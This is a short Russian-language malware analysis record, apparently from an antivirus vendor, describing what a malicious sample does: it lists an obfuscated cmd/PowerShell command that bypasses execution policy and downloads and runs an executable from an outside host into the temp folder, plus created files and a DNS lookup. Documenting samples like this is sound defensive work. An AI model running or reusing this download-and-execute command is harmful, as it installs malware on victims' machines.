Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://0mby.top/fifa/ как $refq222ssa
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c P^owe^rSh^el^l -E^xecut^ionPo^licy By^Pas^s -No^Pro^fil^e -co^mma^nd $refq222ssa=$env:temp+'\sperma.exe';(Ne^w-Obj^ec^t Ne^t.We^b^Cli^e^nt).DownloadFile('http://0mby.top/fifa/',$refq222ssa);...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1896
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\1029169.cvr
Сетевая активность
UDP
- DNS ASK 0m##.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c P^owe^rSh^el^l -E^xecut^ionPo^licy By^Pas^s -No^Pro^fil^e -co^mma^nd $refq222ssa=$env:temp+'\sperma.exe';(Ne^w-Obj^ec^t Ne^t.We^b^Cli^e^nt).DownloadFile('http://0mby.top/fifa/',$refq222ssa);...' (со скрытым окном)
